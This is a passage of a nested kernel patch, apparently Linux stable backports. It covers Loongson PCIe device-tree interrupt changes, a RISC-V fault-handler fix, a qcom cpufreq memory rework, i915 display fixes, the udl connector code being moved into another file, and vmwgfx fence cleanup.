+-				interrupts = <1 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <1 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 1 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 1 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+-			pci_bridge@b,0 {
++			pcie@b,0 {
+ 				compatible = "pci0014,7a09.0",
+ 						   "pci0014,7a09",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x5800 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
+-				interrupts = <2 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <2 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 2 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 2 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+-			pci_bridge@c,0 {
++			pcie@c,0 {
+ 				compatible = "pci0014,7a09.0",
+ 						   "pci0014,7a09",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x6000 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
+-				interrupts = <3 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <3 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 3 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 3 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+-			pci_bridge@d,0 {
++			pcie@d,0 {
+ 				compatible = "pci0014,7a19.0",
+ 						   "pci0014,7a19",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x6800 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
+-				interrupts = <4 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <4 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 4 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 4 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+-			pci_bridge@e,0 {
++			pcie@e,0 {
+ 				compatible = "pci0014,7a09.0",
+ 						   "pci0014,7a09",
+ 						   "pciclass060400",
+ 						   "pciclass0604";
+ 
+ 				reg = <0x7000 0x0 0x0 0x0 0x0>;
++				#address-cells = <3>;
++				#size-cells = <2>;
++				device_type = "pci";
+ 				#interrupt-cells = <1>;
+-				interrupts = <5 IRQ_TYPE_LEVEL_LOW>;
++				interrupts = <5 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-parent = <&liointc1>;
+ 				interrupt-map-mask = <0 0 0 0>;
+-				interrupt-map = <0 0 0 0 &liointc1 5 IRQ_TYPE_LEVEL_LOW>;
++				interrupt-map = <0 0 0 0 &liointc1 5 IRQ_TYPE_LEVEL_HIGH>;
++				ranges;
+ 				external-facing;
+ 			};
+ 
+diff --git a/arch/riscv/mm/fault.c b/arch/riscv/mm/fault.c
+index 274bc6dd839fa..05d7d36479648 100644
+--- a/arch/riscv/mm/fault.c
++++ b/arch/riscv/mm/fault.c
+@@ -60,26 +60,27 @@ static inline void no_context(struct pt_regs *regs, unsigned long addr)
+ 
+ static inline void mm_fault_error(struct pt_regs *regs, unsigned long addr, vm_fault_t fault)
+ {
++	if (!user_mode(regs)) {
++		no_context(regs, addr);
++		return;
++	}
++
+ 	if (fault & VM_FAULT_OOM) {
+ 		/*
+ 		 * We ran out of memory, call the OOM killer, and return the userspace
+ 		 * (which will retry the fault, or kill us if we got oom-killed).
+ 		 */
+-		if (!user_mode(regs)) {
+-			no_context(regs, addr);
+-			return;
+-		}
+ 		pagefault_out_of_memory();
+ 		return;
+ 	} else if (fault & VM_FAULT_SIGBUS) {
+ 		/* Kernel mode? Handle exceptions or die */
+-		if (!user_mode(regs)) {
+-			no_context(regs, addr);
+-			return;
+-		}
+ 		do_trap(regs, SIGBUS, BUS_ADRERR, addr);
+ 		return;
++	} else if (fault & VM_FAULT_SIGSEGV) {
++		do_trap(regs, SIGSEGV, SEGV_MAPERR, addr);
++		return;
+ 	}
++
+ 	BUG();
+ }
+ 
+diff --git a/drivers/cpufreq/qcom-cpufreq-nvmem.c b/drivers/cpufreq/qcom-cpufreq-nvmem.c
+index cb03bfb0435ea..2edb66097cdb9 100644
+--- a/drivers/cpufreq/qcom-cpufreq-nvmem.c
++++ b/drivers/cpufreq/qcom-cpufreq-nvmem.c
+@@ -53,10 +53,14 @@ struct qcom_cpufreq_match_data {
+ 	const char **genpd_names;
+ };
+ 
++struct qcom_cpufreq_drv_cpu {
++	int opp_token;
++};
++
+ struct qcom_cpufreq_drv {
+-	int *opp_tokens;
+ 	u32 versions;
+ 	const struct qcom_cpufreq_match_data *data;
++	struct qcom_cpufreq_drv_cpu cpus[];
+ };
+ 
+ static struct platform_device *cpufreq_dt_pdev, *cpufreq_pdev;
+@@ -284,42 +288,39 @@ static int qcom_cpufreq_probe(struct platform_device *pdev)
+ 		return -ENOENT;
+ 	}
+ 
+-	drv = kzalloc(sizeof(*drv), GFP_KERNEL);
+-	if (!drv)
++	drv = devm_kzalloc(&pdev->dev, struct_size(drv, cpus, num_possible_cpus()),
++		           GFP_KERNEL);
++	if (!drv) {
++		of_node_put(np);
+ 		return -ENOMEM;
++	}
+ 
+ 	match = pdev->dev.platform_data;
+ 	drv->data = match->data;
+ 	if (!drv->data) {
+-		ret = -ENODEV;
+-		goto free_drv;
++		of_node_put(np);
++		return -ENODEV;
+ 	}
+ 
+ 	if (drv->data->get_version) {
+ 		speedbin_nvmem = of_nvmem_cell_get(np, NULL);
+ 		if (IS_ERR(speedbin_nvmem)) {
+-			ret = dev_err_probe(cpu_dev, PTR_ERR(speedbin_nvmem),
+-					    "Could not get nvmem cell\n");
+-			goto free_drv;
++			of_node_put(np);
++			return dev_err_probe(cpu_dev, PTR_ERR(speedbin_nvmem),
++					     "Could not get nvmem cell\n");
+ 		}
+ 
+ 		ret = drv->data->get_version(cpu_dev,
+ 							speedbin_nvmem, &pvs_name, drv);
+ 		if (ret) {
++			of_node_put(np);
+ 			nvmem_cell_put(speedbin_nvmem);
+-			goto free_drv;
++			return ret;
+ 		}
+ 		nvmem_cell_put(speedbin_nvmem);
+ 	}
+ 	of_node_put(np);
+ 
+-	drv->opp_tokens = kcalloc(num_possible_cpus(), sizeof(*drv->opp_tokens),
+-				  GFP_KERNEL);
+-	if (!drv->opp_tokens) {
+-		ret = -ENOMEM;
+-		goto free_drv;
+-	}
+-
+ 	for_each_possible_cpu(cpu) {
+ 		struct dev_pm_opp_config config = {
+ 			.supported_hw = NULL,
+@@ -345,9 +346,9 @@ static int qcom_cpufreq_probe(struct platform_device *pdev)
+ 		}
+ 
+ 		if (config.supported_hw || config.genpd_names) {
+-			drv->opp_tokens[cpu] = dev_pm_opp_set_config(cpu_dev, &config);
+-			if (drv->opp_tokens[cpu] < 0) {
+-				ret = drv->opp_tokens[cpu];
++			drv->cpus[cpu].opp_token = dev_pm_opp_set_config(cpu_dev, &config);
++			if (drv->cpus[cpu].opp_token < 0) {
++				ret = drv->cpus[cpu].opp_token;
+ 				dev_err(cpu_dev, "Failed to set OPP config\n");
+ 				goto free_opp;
+ 			}
+@@ -366,15 +367,11 @@ static int qcom_cpufreq_probe(struct platform_device *pdev)
+ 
+ free_opp:
+ 	for_each_possible_cpu(cpu)
+-		dev_pm_opp_clear_config(drv->opp_tokens[cpu]);
+-	kfree(drv->opp_tokens);
+-free_drv:
+-	kfree(drv);
+-
++		dev_pm_opp_clear_config(drv->cpus[cpu].opp_token);
+ 	return ret;
+ }
+ 
+-static int qcom_cpufreq_remove(struct platform_device *pdev)
++static void qcom_cpufreq_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_cpufreq_drv *drv = platform_get_drvdata(pdev);
+ 	unsigned int cpu;
+@@ -382,17 +379,12 @@ static int qcom_cpufreq_remove(struct platform_device *pdev)
+ 	platform_device_unregister(cpufreq_dt_pdev);
+ 
+ 	for_each_possible_cpu(cpu)
+-		dev_pm_opp_clear_config(drv->opp_tokens[cpu]);
+-
+-	kfree(drv->opp_tokens);
+-	kfree(drv);
+-
+-	return 0;
++		dev_pm_opp_clear_config(drv->cpus[cpu].opp_token);
+ }
+ 
+ static struct platform_driver qcom_cpufreq_driver = {
+ 	.probe = qcom_cpufreq_probe,
+-	.remove = qcom_cpufreq_remove,
++	.remove_new = qcom_cpufreq_remove,
+ 	.driver = {
+ 		.name = "qcom-cpufreq-nvmem",
+ 	},
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_link_training.c b/drivers/gpu/drm/i915/display/intel_dp_link_training.c
+index 3d3efcf02011e..1d9e4534287bb 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_link_training.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_link_training.c
+@@ -103,12 +103,26 @@ intel_dp_set_lttpr_transparent_mode(struct intel_dp *intel_dp, bool enable)
+ 	return drm_dp_dpcd_write(&intel_dp->aux, DP_PHY_REPEATER_MODE, &val, 1) == 1;
+ }
+ 
+-static int intel_dp_init_lttpr(struct intel_dp *intel_dp, const u8 dpcd[DP_RECEIVER_CAP_SIZE])
++static bool intel_dp_lttpr_transparent_mode_enabled(struct intel_dp *intel_dp)
++{
++	return intel_dp->lttpr_common_caps[DP_PHY_REPEATER_MODE -
++					   DP_LT_TUNABLE_PHY_REPEATER_FIELD_DATA_STRUCTURE_REV] ==
++		DP_PHY_REPEATER_MODE_TRANSPARENT;
++}
++
++/*
++ * Read the LTTPR common capabilities and switch the LTTPR PHYs to
++ * non-transparent mode if this is supported. Preserve the
++ * transparent/non-transparent mode on an active link.
++ *
++ * Return the number of detected LTTPRs in non-transparent mode or 0 if the
++ * LTTPRs are in transparent mode or the detection failed.
++ */
++static int intel_dp_init_lttpr_phys(struct intel_dp *intel_dp, const u8 dpcd[DP_RECEIVER_CAP_SIZE])
+ {
+ 	struct intel_encoder *encoder = &dp_to_dig_port(intel_dp)->base;
+ 	struct drm_i915_private *i915 = to_i915(encoder->base.dev);
+ 	int lttpr_count;
+-	int i;
+ 
+ 	if (!intel_dp_read_lttpr_common_caps(intel_dp, dpcd))
+ 		return 0;
+@@ -122,6 +136,19 @@ static int intel_dp_init_lttpr(struct intel_dp *intel_dp, const u8 dpcd[DP_RECEI
+ 	if (lttpr_count == 0)
+ 		return 0;
+ 
++	/*
++	 * Don't change the mode on an active link, to prevent a loss of link
++	 * synchronization. See DP Standard v2.0 3.6.7. about the LTTPR
++	 * resetting its internal state when the mode is changed from
++	 * non-transparent to transparent.
++	 */
++	if (intel_dp->link_trained) {
++		if (lttpr_count < 0 || intel_dp_lttpr_transparent_mode_enabled(intel_dp))
++			goto out_reset_lttpr_count;
++
++		return lttpr_count;
++	}
++
+ 	/*
+ 	 * See DP Standard v2.0 3.6.6.1. about the explicit disabling of
+ 	 * non-transparent mode and the disable->enable non-transparent mode
+@@ -143,11 +170,25 @@ static int intel_dp_init_lttpr(struct intel_dp *intel_dp, const u8 dpcd[DP_RECEI
+ 			    encoder->base.base.id, encoder->base.name);
+ 
+ 		intel_dp_set_lttpr_transparent_mode(intel_dp, true);
+-		intel_dp_reset_lttpr_count(intel_dp);
+ 
+-		return 0;
++		goto out_reset_lttpr_count;
+ 	}
+ 
++	return lttpr_count;
++
++out_reset_lttpr_count:
++	intel_dp_reset_lttpr_count(intel_dp);
++
++	return 0;
++}
++
++static int intel_dp_init_lttpr(struct intel_dp *intel_dp, const u8 dpcd[DP_RECEIVER_CAP_SIZE])
++{
++	int lttpr_count;
++	int i;
++
++	lttpr_count = intel_dp_init_lttpr_phys(intel_dp, dpcd);
++
+ 	for (i = 0; i < lttpr_count; i++)
+ 		intel_dp_read_lttpr_phy_caps(intel_dp, dpcd, DP_PHY_LTTPR(i));
+ 
+@@ -1435,8 +1476,9 @@ void intel_dp_start_link_train(struct intel_dp *intel_dp,
+ {
+ 	bool passed;
+ 	/*
+-	 * TODO: Reiniting LTTPRs here won't be needed once proper connector
+-	 * HW state readout is added.
++	 * Reinit the LTTPRs here to ensure that they are switched to
++	 * non-transparent mode. During an earlier LTTPR detection this
++	 * could've been prevented by an active link.
+ 	 */
+ 	int lttpr_count = intel_dp_init_lttpr_and_dprx_caps(intel_dp);
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_dpll_mgr.c b/drivers/gpu/drm/i915/display/intel_dpll_mgr.c
+index 64dd603dc69aa..ec0ef3ff9e6ab 100644
+--- a/drivers/gpu/drm/i915/display/intel_dpll_mgr.c
++++ b/drivers/gpu/drm/i915/display/intel_dpll_mgr.c
+@@ -1552,7 +1552,7 @@ static void skl_wrpll_params_populate(struct skl_wrpll_params *params,
+ }
+ 
+ static int
+-skl_ddi_calculate_wrpll(int clock /* in Hz */,
++skl_ddi_calculate_wrpll(int clock,
+ 			int ref_clock,
+ 			struct skl_wrpll_params *wrpll_params)
+ {
+@@ -1577,7 +1577,7 @@ skl_ddi_calculate_wrpll(int clock /* in Hz */,
+ 	};
+ 	unsigned int dco, d, i;
+ 	unsigned int p0, p1, p2;
+-	u64 afe_clock = clock * 5; /* AFE Clock is 5x Pixel clock */
++	u64 afe_clock = (u64)clock * 1000 * 5; /* AFE Clock is 5x Pixel clock, in Hz */
+ 
+ 	for (d = 0; d < ARRAY_SIZE(dividers); d++) {
+ 		for (dco = 0; dco < ARRAY_SIZE(dco_central_freq); dco++) {
+@@ -1709,7 +1709,7 @@ static int skl_ddi_hdmi_pll_dividers(struct intel_crtc_state *crtc_state)
+ 
+ 	ctrl1 |= DPLL_CTRL1_HDMI_MODE(0);
+ 
+-	ret = skl_ddi_calculate_wrpll(crtc_state->port_clock * 1000,
++	ret = skl_ddi_calculate_wrpll(crtc_state->port_clock,
+ 				      i915->display.dpll.ref_clks.nssc, &wrpll_params);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/gpu/drm/i915/display/intel_hdcp_regs.h b/drivers/gpu/drm/i915/display/intel_hdcp_regs.h
+index 2a3733e8966c1..2702cc8c88d8d 100644
+--- a/drivers/gpu/drm/i915/display/intel_hdcp_regs.h
++++ b/drivers/gpu/drm/i915/display/intel_hdcp_regs.h
+@@ -249,7 +249,7 @@
+ #define HDCP2_STREAM_STATUS(dev_priv, trans, port) \
+ 					(GRAPHICS_VER(dev_priv) >= 12 ? \
+ 					 TRANS_HDCP2_STREAM_STATUS(trans) : \
+-					 PIPE_HDCP2_STREAM_STATUS(pipe))
++					 PIPE_HDCP2_STREAM_STATUS(port))
+ 
+ #define _PORTA_HDCP2_AUTH_STREAM		0x66F00
+ #define _PORTB_HDCP2_AUTH_STREAM		0x66F04
+diff --git a/drivers/gpu/drm/nouveau/nouveau_prime.c b/drivers/gpu/drm/nouveau/nouveau_prime.c
+index 9608121e49b7e..8340d55aaa987 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_prime.c
++++ b/drivers/gpu/drm/nouveau/nouveau_prime.c
+@@ -63,7 +63,8 @@ struct drm_gem_object *nouveau_gem_prime_import_sg_table(struct drm_device *dev,
+ 	 * to the caller, instead of a normal nouveau_bo ttm reference. */
+ 	ret = drm_gem_object_init(dev, &nvbo->bo.base, size);
+ 	if (ret) {
+-		nouveau_bo_ref(NULL, &nvbo);
++		drm_gem_object_release(&nvbo->bo.base);
++		kfree(nvbo);
+ 		obj = ERR_PTR(-ENOMEM);
+ 		goto unlock;
+ 	}
+diff --git a/drivers/gpu/drm/udl/Makefile b/drivers/gpu/drm/udl/Makefile
+index 24d61f61d7db2..3f6db179455d1 100644
+--- a/drivers/gpu/drm/udl/Makefile
++++ b/drivers/gpu/drm/udl/Makefile
+@@ -1,4 +1,4 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-udl-y := udl_drv.o udl_modeset.o udl_connector.o udl_main.o udl_transfer.o
++udl-y := udl_drv.o udl_modeset.o udl_main.o udl_transfer.o
+ 
+ obj-$(CONFIG_DRM_UDL) := udl.o
+diff --git a/drivers/gpu/drm/udl/udl_connector.c b/drivers/gpu/drm/udl/udl_connector.c
+deleted file mode 100644
+index fade4c7adbf78..0000000000000
+--- a/drivers/gpu/drm/udl/udl_connector.c
++++ /dev/null
+@@ -1,139 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/*
+- * Copyright (C) 2012 Red Hat
+- * based in parts on udlfb.c:
+- * Copyright (C) 2009 Roberto De Ioris <roberto@unbit.it>
+- * Copyright (C) 2009 Jaya Kumar <jayakumar.lkml@gmail.com>
+- * Copyright (C) 2009 Bernie Thompson <bernie@plugable.com>
+- */
+-
+-#include <drm/drm_atomic_state_helper.h>
+-#include <drm/drm_edid.h>
+-#include <drm/drm_crtc_helper.h>
+-#include <drm/drm_probe_helper.h>
+-
+-#include "udl_connector.h"
+-#include "udl_drv.h"
+-
+-static int udl_get_edid_block(void *data, u8 *buf, unsigned int block,
+-			       size_t len)
+-{
+-	int ret, i;
+-	u8 *read_buff;
+-	struct udl_device *udl = data;
+-	struct usb_device *udev = udl_to_usb_device(udl);
+-
+-	read_buff = kmalloc(2, GFP_KERNEL);
+-	if (!read_buff)
+-		return -1;
+-
+-	for (i = 0; i < len; i++) {
+-		int bval = (i + block * EDID_LENGTH) << 8;
+-		ret = usb_control_msg(udev, usb_rcvctrlpipe(udev, 0),
+-				      0x02, (0x80 | (0x02 << 5)), bval,
+-				      0xA1, read_buff, 2, 1000);
+-		if (ret < 1) {
+-			DRM_ERROR("Read EDID byte %d failed err %x\n", i, ret);
+-			kfree(read_buff);
+-			return -1;
+-		}
+-		buf[i] = read_buff[1];
+-	}
+-
+-	kfree(read_buff);
+-	return 0;
+-}
+-
+-static int udl_get_modes(struct drm_connector *connector)
+-{
+-	struct udl_drm_connector *udl_connector =
+-					container_of(connector,
+-					struct udl_drm_connector,
+-					connector);
+-
+-	drm_connector_update_edid_property(connector, udl_connector->edid);
+-	if (udl_connector->edid)
+-		return drm_add_edid_modes(connector, udl_connector->edid);
+-	return 0;
+-}
+-
+-static enum drm_mode_status udl_mode_valid(struct drm_connector *connector,
+-			  struct drm_display_mode *mode)
+-{
+-	struct udl_device *udl = to_udl(connector->dev);
+-	if (!udl->sku_pixel_limit)
+-		return 0;
+-
+-	if (mode->vdisplay * mode->hdisplay > udl->sku_pixel_limit)
+-		return MODE_VIRTUAL_Y;
+-
+-	return 0;
+-}
+-
+-static enum drm_connector_status
+-udl_detect(struct drm_connector *connector, bool force)
+-{
+-	struct udl_device *udl = to_udl(connector->dev);
+-	struct udl_drm_connector *udl_connector =
+-					container_of(connector,
+-					struct udl_drm_connector,
+-					connector);
+-
+-	/* cleanup previous edid */
+-	if (udl_connector->edid != NULL) {
+-		kfree(udl_connector->edid);
+-		udl_connector->edid = NULL;
+-	}
+-
+-	udl_connector->edid = drm_do_get_edid(connector, udl_get_edid_block, udl);
+-	if (!udl_connector->edid)
+-		return connector_status_disconnected;
+-
+-	return connector_status_connected;
+-}
+-
+-static void udl_connector_destroy(struct drm_connector *connector)
+-{
+-	struct udl_drm_connector *udl_connector =
+-					container_of(connector,
+-					struct udl_drm_connector,
+-					connector);
+-
+-	drm_connector_cleanup(connector);
+-	kfree(udl_connector->edid);
+-	kfree(connector);
+-}
+-
+-static const struct drm_connector_helper_funcs udl_connector_helper_funcs = {
+-	.get_modes = udl_get_modes,
+-	.mode_valid = udl_mode_valid,
+-};
+-
+-static const struct drm_connector_funcs udl_connector_funcs = {
+-	.reset = drm_atomic_helper_connector_reset,
+-	.detect = udl_detect,
+-	.fill_modes = drm_helper_probe_single_connector_modes,
+-	.destroy = udl_connector_destroy,
+-	.atomic_duplicate_state = drm_atomic_helper_connector_duplicate_state,
+-	.atomic_destroy_state   = drm_atomic_helper_connector_destroy_state,
+-};
+-
+-struct drm_connector *udl_connector_init(struct drm_device *dev)
+-{
+-	struct udl_drm_connector *udl_connector;
+-	struct drm_connector *connector;
+-
+-	udl_connector = kzalloc(sizeof(struct udl_drm_connector), GFP_KERNEL);
+-	if (!udl_connector)
+-		return ERR_PTR(-ENOMEM);
+-
+-	connector = &udl_connector->connector;
+-	drm_connector_init(dev, connector, &udl_connector_funcs,
+-			   DRM_MODE_CONNECTOR_VGA);
+-	drm_connector_helper_add(connector, &udl_connector_helper_funcs);
+-
+-	connector->polled = DRM_CONNECTOR_POLL_HPD |
+-		DRM_CONNECTOR_POLL_CONNECT | DRM_CONNECTOR_POLL_DISCONNECT;
+-
+-	return connector;
+-}
+diff --git a/drivers/gpu/drm/udl/udl_connector.h b/drivers/gpu/drm/udl/udl_connector.h
+deleted file mode 100644
+index 7f2d392df1737..0000000000000
+--- a/drivers/gpu/drm/udl/udl_connector.h
++++ /dev/null
+@@ -1,15 +0,0 @@
+-#ifndef __UDL_CONNECTOR_H__
+-#define __UDL_CONNECTOR_H__
+-
+-#include <drm/drm_crtc.h>
+-
+-struct edid;
+-
+-struct udl_drm_connector {
+-	struct drm_connector connector;
+-	/* last udl_detect edid */
+-	struct edid *edid;
+-};
+-
+-
+-#endif //__UDL_CONNECTOR_H__
+diff --git a/drivers/gpu/drm/udl/udl_drv.h b/drivers/gpu/drm/udl/udl_drv.h
+index b4cc7cc568c74..d7a3d495f2e7e 100644
+--- a/drivers/gpu/drm/udl/udl_drv.h
++++ b/drivers/gpu/drm/udl/udl_drv.h
+@@ -46,6 +46,17 @@ struct urb_list {
+ 	size_t size;
+ };
+ 
++struct udl_connector {
++	struct drm_connector connector;
++	/* last udl_detect edid */
++	struct edid *edid;
++};
++
++static inline struct udl_connector *to_udl_connector(struct drm_connector *connector)
++{
++	return container_of(connector, struct udl_connector, connector);
++}
++
+ struct udl_device {
+ 	struct drm_device drm;
+ 	struct device *dev;
+diff --git a/drivers/gpu/drm/udl/udl_modeset.c b/drivers/gpu/drm/udl/udl_modeset.c
+index ec6876f449f31..8f4c4a857b6e8 100644
+--- a/drivers/gpu/drm/udl/udl_modeset.c
++++ b/drivers/gpu/drm/udl/udl_modeset.c
+@@ -11,11 +11,13 @@
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_crtc_helper.h>
+ #include <drm/drm_damage_helper.h>
++#include <drm/drm_edid.h>
+ #include <drm/drm_fourcc.h>
+ #include <drm/drm_gem_atomic_helper.h>
+ #include <drm/drm_gem_framebuffer_helper.h>
+ #include <drm/drm_gem_shmem_helper.h>
+ #include <drm/drm_modeset_helper_vtables.h>
++#include <drm/drm_probe_helper.h>
+ #include <drm/drm_vblank.h>
+ 
+ #include "udl_drv.h"
+@@ -403,12 +405,145 @@ static const struct drm_simple_display_pipe_funcs udl_simple_display_pipe_funcs
+ 	DRM_GEM_SIMPLE_DISPLAY_PIPE_SHADOW_PLANE_FUNCS,
+ };
+ 
++/*
++ * Connector
++ */
++
++static int udl_connector_helper_get_modes(struct drm_connector *connector)
++{
++	struct udl_connector *udl_connector = to_udl_connector(connector);
++
++	drm_connector_update_edid_property(connector, udl_connector->edid);
++	if (udl_connector->edid)
++		return drm_add_edid_modes(connector, udl_connector->edid);
++
++	return 0;
++}
++
++static const struct drm_connector_helper_funcs udl_connector_helper_funcs = {
++	.get_modes = udl_connector_helper_get_modes,
++};
++
++static int udl_get_edid_block(void *data, u8 *buf, unsigned int block, size_t len)
++{
++	struct udl_device *udl = data;
++	struct drm_device *dev = &udl->drm;
++	struct usb_device *udev = udl_to_usb_device(udl);
++	u8 *read_buff;
++	int ret;
++	size_t i;
++
++	read_buff = kmalloc(2, GFP_KERNEL);
++	if (!read_buff)
++		return -ENOMEM;
++
++	for (i = 0; i < len; i++) {
++		int bval = (i + block * EDID_LENGTH) << 8;
++
++		ret = usb_control_msg(udev, usb_rcvctrlpipe(udev, 0),
++				      0x02, (0x80 | (0x02 << 5)), bval,
++				      0xA1, read_buff, 2, USB_CTRL_GET_TIMEOUT);
++		if (ret < 0) {
++			drm_err(dev, "Read EDID byte %zu failed err %x\n", i, ret);
++			goto err_kfree;
++		} else if (ret < 1) {
++			ret = -EIO;
++			drm_err(dev, "Read EDID byte %zu failed\n", i);
++			goto err_kfree;
++		}
++
++		buf[i] = read_buff[1];
++	}
++
++	kfree(read_buff);
++
++	return 0;
++
++err_kfree:
++	kfree(read_buff);
++	return ret;
++}
++
++static enum drm_connector_status udl_connector_detect(struct drm_connector *connector, bool force)
++{
++	struct udl_device *udl = to_udl(connector->dev);
++	struct udl_connector *udl_connector = to_udl_connector(connector);
++
++	/* cleanup previous EDID */
++	kfree(udl_connector->edid);
++
++	udl_connector->edid = drm_do_get_edid(connector, udl_get_edid_block, udl);
++	if (!udl_connector->edid)
++		return connector_status_disconnected;
++
++	return connector_status_connected;
++}
++
++static void udl_connector_destroy(struct drm_connector *connector)
++{
++	struct udl_connector *udl_connector = to_udl_connector(connector);
++
++	drm_connector_cleanup(connector);
++	kfree(udl_connector->edid);
++	kfree(udl_connector);
++}
++
++static const struct drm_connector_funcs udl_connector_funcs = {
++	.reset = drm_atomic_helper_connector_reset,
++	.detect = udl_connector_detect,
++	.fill_modes = drm_helper_probe_single_connector_modes,
++	.destroy = udl_connector_destroy,
++	.atomic_duplicate_state = drm_atomic_helper_connector_duplicate_state,
++	.atomic_destroy_state = drm_atomic_helper_connector_destroy_state,
++};
++
++struct drm_connector *udl_connector_init(struct drm_device *dev)
++{
++	struct udl_connector *udl_connector;
++	struct drm_connector *connector;
++	int ret;
++
++	udl_connector = kzalloc(sizeof(*udl_connector), GFP_KERNEL);
++	if (!udl_connector)
++		return ERR_PTR(-ENOMEM);
++
++	connector = &udl_connector->connector;
++	ret = drm_connector_init(dev, connector, &udl_connector_funcs, DRM_MODE_CONNECTOR_VGA);
++	if (ret)
++		goto err_kfree;
++
++	drm_connector_helper_add(connector, &udl_connector_helper_funcs);
++
++	connector->polled = DRM_CONNECTOR_POLL_CONNECT |
++			    DRM_CONNECTOR_POLL_DISCONNECT;
++
++	return connector;
++
++err_kfree:
++	kfree(udl_connector);
++	return ERR_PTR(ret);
++}
++
+ /*
+  * Modesetting
+  */
+ 
++static enum drm_mode_status udl_mode_config_mode_valid(struct drm_device *dev,
++						       const struct drm_display_mode *mode)
++{
++	struct udl_device *udl = to_udl(dev);
++
++	if (udl->sku_pixel_limit) {
++		if (mode->vdisplay * mode->hdisplay > udl->sku_pixel_limit)
++			return MODE_MEM;
++	}
++
++	return MODE_OK;
++}
++
+ static const struct drm_mode_config_funcs udl_mode_funcs = {
+ 	.fb_create = drm_gem_fb_create_with_dirty,
++	.mode_valid = udl_mode_config_mode_valid,
+ 	.atomic_check  = drm_atomic_helper_check,
+ 	.atomic_commit = drm_atomic_helper_commit,
+ };
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c b/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
+index 95344735d00e6..add39769283f6 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
+@@ -32,7 +32,6 @@
+ #define VMW_FENCE_WRAP (1 << 31)
+ 
+ struct vmw_fence_manager {
+-	int num_fence_objects;
+ 	struct vmw_private *dev_priv;
+ 	spinlock_t lock;
+ 	struct list_head fence_list;
+@@ -124,13 +123,13 @@ static void vmw_fence_obj_destroy(struct dma_fence *f)
+ {
+ 	struct vmw_fence_obj *fence =
+ 		container_of(f, struct vmw_fence_obj, base);
+-
+ 	struct vmw_fence_manager *fman = fman_from_fence(fence);
+ 
+-	spin_lock(&fman->lock);
+-	list_del_init(&fence->head);
+-	--fman->num_fence_objects;
+-	spin_unlock(&fman->lock);
++	if (!list_empty(&fence->head)) {
++		spin_lock(&fman->lock);
++		list_del_init(&fence->head);
++		spin_unlock(&fman->lock);
++	}
+ 	fence->destroy(fence);
+ }
+ 
+@@ -257,7 +256,6 @@ static const struct dma_fence_ops vmw_fence_ops = {
+ 	.release = vmw_fence_obj_destroy,
+ };
+ 
+-
+ /*
+  * Execute signal actions on fences recently signaled.
+  * This is done from a workqueue so we don't have to execute
+@@ -355,7 +353,6 @@ static int vmw_fence_obj_init(struct vmw_fence_manager *fman,
+ 		goto out_unlock;
+ 	}
+ 	list_add_tail(&fence->head, &fman->fence_list);
+-	++fman->num_fence_objects;
+ 
+ out_unlock:
+ 	spin_unlock(&fman->lock);
+@@ -403,7 +400,7 @@ static bool vmw_fence_goal_new_locked(struct vmw_fence_manager *fman,
+ 				      u32 passed_seqno)
+ {
+ 	u32 goal_seqno;
+-	struct vmw_fence_obj *fence;
++	struct vmw_fence_obj *fence, *next_fence;
+ 
+ 	if (likely(!fman->seqno_valid))
+ 		return false;
+@@ -413,7 +410,7 @@ static bool vmw_fence_goal_new_locked(struct vmw_fence_manager *fman,
+ 		return false;
+ 
+ 	fman->seqno_valid = false;
+-	list_for_each_entry(fence, &fman->fence_list, head) {
